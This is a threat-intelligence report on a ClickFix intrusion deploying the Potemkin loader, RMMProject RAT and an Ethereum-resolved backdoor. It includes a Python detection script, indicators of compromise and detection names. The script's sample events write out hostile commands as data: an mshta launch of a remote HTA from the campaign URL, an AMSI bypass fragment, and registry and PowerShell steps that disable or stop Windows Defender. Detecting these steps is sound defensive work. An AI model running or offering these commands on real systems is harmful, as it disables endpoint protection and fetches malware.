Potemkin Loader ClickFix Intrusion: Multi-Stage Campaign Deploying RMMProject RAT and Blockchain-Resolved Backdoor
In a confirmed hands-on intrusion spanning eleven endpoints, attackers gained initial access through a ClickFix lure served from a compromised website that directed victims to paste a command into the Windows Run dialog. The command abuses pcalua.exe as a LOLBIN to spawn mshta.exe with a remote HTA URL, which silently downloads and executes an MSI installer delivering the Potemkin loader. Potemkin is a compact custom loader that uses a deterministic domain generation algorithm built on XorShift32 to probe ten thousand candidate domains for active C2, reflectively loading its follow-on payload directly in memory once contact is made. The use of a shared DGA codebase between Potemkin and its second stage, RMMProject, suggests a single development team behind the campaign.
RMMProject is a modular RAT framework embedding a LuaJIT scripting engine that gives the operator dynamic execution capability without recompiling the implant. Its capabilities cover browser credential and cookie theft across Chrome, Firefox, and Edge, an App-Bound Encryption bypass that injects a helper DLL into a spawned Chrome process to decrypt stored secrets from Chrome version 127 and later, remote desktop control on a hidden Windows desktop, process injection, and reflective module loading. Following RMMProject deployment, a second installer delivers EtherRAT: a Node.js-based backdoor that resolves its C2 server address by reading a value from an Ethereum smart contract, making the C2 channel resilient to domain takedowns since updates require only a low-cost blockchain transaction. A renamed Cloudflare tunnel binary provides an additional persistent inbound access channel.
What distinguishes this intrusion is the visible adaptability of the human operator once inside. Rather than running a fixed playbook, the attacker cycled through a progression of defense evasion techniques in response to Defender detections: beginning with disabling Windows' built-in script scanning interface (AMSI) via .NET reflection, escalating to registry policy writes that stripped real-time protection, then adding exclusion paths via PowerShell, and ultimately terminating the Windows Defender service entirely when earlier attempts were blocked. This back-and-forth against endpoint defenses played out while the attacker simultaneously deployed a Chisel reverse proxy for network pivoting and spread the loader across eleven hosts using Impacket-style remote execution, compromising domain administrator credentials and reaching the domain controller. The attacker likely had hours of unobserved access on at least one endpoint before any telemetry existed, underscoring the risk of gaps in endpoint monitoring coverage.
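The behaviours described above (the pcalua.exe to mshta.exe ClickFix launch, the four-step Defender tampering progression, and EtherRAT's non-browser reads from an Ethereum JSON-RPC endpoint) map cleanly onto a small set of telemetry rules. The following is an added example written for this write-up, not code from the report or from any vendor product: it runs a handful of regex and field-match rules over constructed process-creation and network events, then reconstructs the per-host Defender-tampering escalation so an analyst can see an operator reacting to blocks rather than running a fixed script. The event field names, the list of public Ethereum RPC hostnames, and the sample command lines are assumptions chosen for illustration.

```python
"""Rule-based triage of constructed EDR telemetry for the tradecraft in this
report. Event schema, RPC host list and sample events are assumptions."""
import re
from dataclasses import dataclass

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
# Assumed examples of public Ethereum JSON-RPC endpoints; extend from your own telemetry.
ETH_RPC_HOSTS = {"cloudflare-eth.com", "mainnet.infura.io"}

# Defender-tampering stages in the order the intrusion narrative escalates.
DEFENDER_STAGES = [
    ("amsi_bypass", re.compile(r"AmsiUtils|amsiInitFailed|AmsiScanBuffer", re.I)),
    ("rtp_policy_write", re.compile(r"DisableRealtimeMonitoring|DisableAntiSpyware", re.I)),
    ("exclusion_added", re.compile(r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)", re.I)),
    ("service_stopped", re.compile(r"(Stop-Service|sc(\.exe)?\s+stop|net\s+stop)\s+.*WinDefend", re.I)),
]
# pcalua.exe used as a proxy to launch mshta.exe with a remote HTA, as in the ClickFix lure.
CLICKFIX = re.compile(r"pcalua(\.exe)?\s+-a\s+mshta(\.exe)?\s+https?://", re.I)

# Constructed sample telemetry (not from the report). The AMSI line is a
# deliberately truncated reflection fragment; only its tokens matter here.
SAMPLE_EVENTS = [
    {"type": "process", "host": "ws01", "parent": "explorer.exe",
     "cmdline": "pcalua.exe -a mshta.exe https://cl.distritovagas.com/hte.hta"},
    {"type": "process", "host": "ws01", "parent": "powershell.exe",
     "cmdline": "powershell -nop -w hidden -c \"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils') ...\""},
    {"type": "process", "host": "ws01", "parent": "cmd.exe",
     "cmdline": r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f'},
    {"type": "process", "host": "ws01", "parent": "cmd.exe",
     "cmdline": r'powershell -c "Add-MpPreference -ExclusionPath C:\Users\Public"'},
    {"type": "process", "host": "ws01", "parent": "cmd.exe",
     "cmdline": 'powershell -c "Stop-Service -Name WinDefend -Force"'},
    {"type": "process", "host": "ws02", "parent": "cmd.exe",
     "cmdline": "powershell -c Get-MpPreference"},  # benign admin query, must not fire
    {"type": "network", "host": "ws01", "process": "node.exe",
     "dest": "cloudflare-eth.com", "port": 443, "jsonrpc_method": "eth_call"},
    {"type": "network", "host": "ws02", "process": "chrome.exe",
     "dest": "cloudflare-eth.com", "port": 443, "jsonrpc_method": "eth_call"},  # browser, expected
]


@dataclass
class Finding:
    host: str
    rule: str
    evidence: str


def evaluate(events):
    """Apply every rule to every event and return the findings in event order."""
    findings = []
    for ev in events:
        if ev["type"] == "process":
            cmd = ev["cmdline"]
            if CLICKFIX.search(cmd):
                findings.append(Finding(ev["host"], "clickfix_pcalua_mshta", cmd))
            for stage, pattern in DEFENDER_STAGES:
                if pattern.search(cmd):
                    findings.append(Finding(ev["host"], f"defender_tamper:{stage}", cmd))
        elif ev["type"] == "network":
            non_browser = ev["process"].lower() not in BROWSERS
            eth_rpc = ev["dest"] in ETH_RPC_HOSTS or ev.get("jsonrpc_method", "").startswith("eth_")
            if non_browser and eth_rpc:
                findings.append(Finding(ev["host"], "eth_rpc_from_non_browser",
                                        f'{ev["process"]} -> {ev["dest"]}:{ev["port"]}'))
    return findings


def tamper_progression(findings):
    """Per host, the Defender-tampering stages observed, listed in escalation
    order. A host that reaches service_stopped after the earlier stages shows
    an operator adapting to blocked attempts rather than a fixed playbook."""
    order = [stage for stage, _ in DEFENDER_STAGES]
    seen = {}
    for f in findings:
        if f.rule.startswith("defender_tamper:"):
            seen.setdefault(f.host, set()).add(f.rule.split(":", 1)[1])
    return {host: [s for s in order if s in stages] for host, stages in seen.items()}


if __name__ == "__main__":
    results = evaluate(SAMPLE_EVENTS)
    for f in results:
        print(f"{f.host:5} {f.rule:34} {f.evidence[:70]}")
    print(tamper_progression(results))
```

The progression view is the part worth keeping: a single `Add-MpPreference` exclusion on a build server is noise, but one host that hits AMSI tampering, a real-time-protection policy write, an exclusion and a `WinDefend` stop within the same session is a hands-on operator and should be escalated as such, with the earliest event used to bound how long the host went unobserved.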
IOCs (19)
SHA256 FILE HASH (5)
- 2abe5dd3a057fdef935722e50e9251c272d29fd26113187b853a1f9a9cb89d9b
- 79f7b67ce8b39070f3e1c2b90fce0ce84134782a7dedcccc1edac197ee9e089b
- 3b7ae925e2d64522b4f69b56285b05aeca8c5aab5ab46a9c02c4fafb69d881ce
- cd4e5e2c65b1660470d3446539ee68adf5faeece3eaeb46583623be9911ee145
- 2ada24dd6e517f37942b749c2bd57ddd97445e9853002cee70a0bc30d0b0ce3a
IP ADDRESS (2)
- 77.110.122.58
- 213.165.41.26
DOMAIN (5)
- cl.distritovagas.com
- sonra.eutialyson.com
- anus-staylard.xyz
- pestrear-lamp.xyz
- resumeacceptable.com
URL (2)
- https://cl.distritovagas.com/hte.hta
- https://sonra.eutialyson.com/inst24.msi
FILE NAME (5)
- inst24.msi
- cons_1.0.1.msi
- hyper-v.ver
- ek_kill_av.ps1
- ek_disable_av.ps1
Detections (10)
- ClickFix-RunMRU-Registry-Write-with-Suspicious-Command
- ConHost Headless Spawning Node Process
- WinDefend Service Termination via PowerShell
- Windows Defender Protection Disabled via PowerShell or Registry
- Scheduled Task Registering Binary from User-Writable Path
- Non-Browser Process Connecting to Ethereum RPC
- PUA - Chisel Tunneling Tool Execution
- Detect reflective DLL injection or in-memory assembly loading without disk writes
- Detect encoded PowerShell, download cradles, and AMSI bypasses